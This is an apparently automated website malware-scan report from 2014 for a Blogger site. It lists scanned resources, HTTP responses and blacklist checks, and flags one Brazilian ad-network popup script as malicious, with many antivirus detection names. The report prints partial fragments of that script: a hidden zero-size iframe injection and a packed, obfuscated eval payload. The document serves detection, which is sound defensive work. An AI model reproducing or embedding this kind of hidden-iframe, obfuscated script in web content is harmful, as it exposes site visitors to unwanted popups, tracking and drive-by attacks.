New scan:

Malware Scanner report for obaudosrockers.com

Malicious/Suspicious/Total urls checked
1/1/14
2 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://obaudosrockers.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 09 Oct 2014 19:51:34 GMT
Location: http://www.obaudosrockers.com/
Server: ghs
Content-Length: 227
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic,p=0.01
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
clean
http://www.obaudosrockers.com/
200 OK
Content-Length: 103006
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.anunciad.com.br

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir='ltr' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
<head>
<link href='http://fonts.googleapis.com/css?family=Marck+Script|Pinyon+Script|Kristi|Salsa' rel='stylesheet' type
...[3839 bytes skipped]...

https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
200 OK
Content-Length: 78601
Content-Type: text/javascript
clean
http://ads.egrana.com.br/anuncio/popup/10203
200 OK
Content-Length: 6554
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('<iframe style="display:none" src="http://ads.egrana.com.br/stats/pop/" width="0" height="0" frameborder="0" marginwidh="0" marginheight="0" scrolling="no"></iframe>');eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'
... 3107 bytes are skipped ...
ialogHeight|opera|adc|resizeTo|moveTo|opener|750|850|1850|950|141144143141163150|frameborder|hidden|backgroundColor|transparent|opacity|||cursor|pointer|position|absolute|zIndex|999|pageY|pageX|79|form|form141144143141163150|input|type|clearInterval|setInterval|1024|768|a616463736899|documentElement|webkitRequestFullscreen|Element|ALLOW_KEYBOARD_INPUT|webkitCancelFullScreen|a6164637368|data|text|html|charset|utf|encodeURI|536|onclick|2000|beforeunload|loadScript|scripts|pop|js'.split('|'),0,{}))

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
JS:Iframe-ALS [Trj]
nProtect
Trojan.Iframe.BZW
Comodo
TrojWare.JS.Iframe.FK
McAfee-GW-Edition
JS/IFrame.gen.j
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Exploit:HTML/IframeRef.DM
MicroWorld-eScan
Trojan.Iframe.BZW
PCTools
Exploit.IFrame
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
F-Secure
Trojan.Iframe.BZW
VIPRE
Exploit.HTML.Iframe.dm (v)
AVG
HTML/Framer
Norman
Iframe.UW
Sophos
Troj/Iframe-JG
GData
Trojan.Iframe.BZW
Symantec
IFrame.Exploit
ESET-NOD32
JS/Iframe.HH
BitDefender
Trojan.Iframe.BZW

https://apis.google.com/js/plusone.js
200 OK
Content-Length: 12600
Content-Type: application/javascript
clean
http://tweetmeme.com/i/scripts/button.js
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=86400
Connection: close
Date: Thu, 09 Oct 2014 19:51:39 GMT
Location: http://tweetmeme.com/
Server: nginx
Content-Length: 178
Content-Type: text/html
Expires: Fri, 10 Oct 2014 19:51:39 GMT
X-Served-By: h03
clean
http://tweetmeme.com/
200 OK
Content-Length: 1833
Content-Type: text/html
clean
http://tweetmeme.com/js/vendor/jquery-1.9.1.min.js
200 OK
Content-Length: 92630
Content-Type: application/x-javascript
clean
http://tweetmeme.com/i/scripts/js/main.js
404 Not Found
Content-Length: 564
Content-Type: text/html
clean
http://tweetmeme.com/test404page.js
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=86400
Connection: close
Date: Thu, 09 Oct 2014 19:51:40 GMT
Location: http://tweetmeme.com/
Server: nginx
Content-Length: 178
Content-Type: text/html
Expires: Fri, 10 Oct 2014 19:51:40 GMT
X-Served-By: h03
clean
http://static.ak.fbcdn.net/connect.php/js/FB.Share
200 OK
Content-Length: 165813
Content-Type: application/x-javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21308
Content-Type: text/javascript
clean
http://www.anunciad.com.br/table_ad.jsp?partner=4568
200 OK
Content-Length: 1769
Content-Type: text/html
clean
https://www.blogger.com/static/v1/widgets/2271878333-widgets.js
200 OK
Content-Length: 90737
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: obaudosrockers.com

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 09 Oct 2014 19:51:34 GMT
Location: http://www.obaudosrockers.com/
Server: ghs
Content-Length: 227
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic,p=0.01
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block

...227 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: obaudosrockers.com
Referer: http://www.google.com/search?q=obaudosrockers.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=obaudosrockers.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://obaudosrockers.com/

Result: obaudosrockers.com is not infected or malware details are not published yet.